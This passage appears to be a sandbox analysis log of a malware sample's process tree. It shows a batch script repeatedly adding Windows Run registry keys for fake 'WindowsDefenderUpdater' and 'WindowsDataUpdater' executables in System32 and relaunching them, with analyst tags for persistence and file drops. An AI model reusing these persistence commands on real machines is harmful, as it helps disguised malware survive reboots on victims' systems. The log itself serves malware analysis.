C:\Windows\system32\timeout.exetimeout 1107⤵PID:3228
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f107⤵PID:3992
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f107⤵PID:992
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f107⤵
- Adds Run key to start application
PID:4088
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f107⤵PID:1504
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"107⤵PID:3216
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"108⤵PID:1576
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"107⤵PID:3336
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"107⤵PID:3700
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9EDE.tmp\9EDF.tmp\9EE0.bat C:\Windows\system32\java.exe"108⤵PID:3284
-
C:\Windows\system32\timeout.exetimeout 1109⤵
- Delays execution with timeout.exe
PID:3612
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f109⤵PID:2372
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f109⤵PID:4036
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f109⤵PID:1436
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f109⤵PID:624
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"109⤵PID:3732
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"110⤵PID:3400
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"109⤵PID:3904
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"109⤵PID:2720
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A303.tmp\A304.tmp\A305.bat C:\Windows\system32\java.exe"110⤵
- Drops file in System32 directory
PID:3596 -
C:\Windows\system32\timeout.exetimeout 1111⤵PID:1432
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f111⤵PID:3820
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f111⤵PID:2196
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f111⤵PID:2916
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f111⤵PID:1980
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"111⤵PID:3232
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"112⤵PID:3892
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"111⤵PID:3668
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"111⤵PID:2144
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A6F9.tmp\A6FA.tmp\A6FB.bat C:\Windows\system32\java.exe"112⤵
- Drops file in System32 directory
PID:3992 -
C:\Windows\system32\timeout.exetimeout 1113⤵PID:3180
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f113⤵PID:3540
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f113⤵PID:1980
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f113⤵PID:560
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f113⤵
- Adds Run key to start application
PID:916
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"113⤵PID:3264
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"114⤵PID:3888
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"113⤵PID:3604
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"113⤵PID:3632
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AA91.tmp\AA92.tmp\AA93.bat C:\Windows\system32\java.exe"114⤵PID:4000
-
C:\Windows\system32\timeout.exetimeout 1115⤵PID:2544
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f115⤵PID:2296
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f115⤵PID:2260
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f115⤵PID:3904
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f115⤵PID:1300
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"115⤵PID:1432
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"116⤵PID:2888
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"115⤵PID:2676
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"115⤵PID:3124
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AE97.tmp\AE98.tmp\AE99.bat C:\Windows\system32\java.exe"116⤵
- Drops file in System32 directory
PID:3296 -
C:\Windows\system32\timeout.exetimeout 1117⤵PID:3572
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f117⤵PID:1624
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f117⤵PID:2276
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f117⤵
- Adds Run key to start application
PID:2844
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f117⤵PID:3424
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"117⤵PID:3004
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"118⤵PID:1908
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"117⤵PID:3320
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"117⤵PID:3900
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B2CB.tmp\B2CC.tmp\B2CD.bat C:\Windows\system32\java.exe"118⤵
- Drops file in System32 directory
PID:3668 -
C:\Windows\system32\timeout.exetimeout 1119⤵PID:3540
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f119⤵PID:3172
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f119⤵PID:3572
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f119⤵
- Adds Run key to start application
PID:1624
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f119⤵PID:2276
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"119⤵PID:2844
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"120⤵PID:3496
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"119⤵PID:3424
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"119⤵PID:2576
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B635.tmp\B636.tmp\B637.bat C:\Windows\system32\java.exe"120⤵PID:2556
-
C:\Windows\system32\timeout.exetimeout 1121⤵
- Delays execution with timeout.exe
PID:3524
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f121⤵PID:1624
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f121⤵PID:2276
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f121⤵PID:3644
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f121⤵
- Adds Run key to start application
PID:3196
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"121⤵PID:1540
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"122⤵PID:4012
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-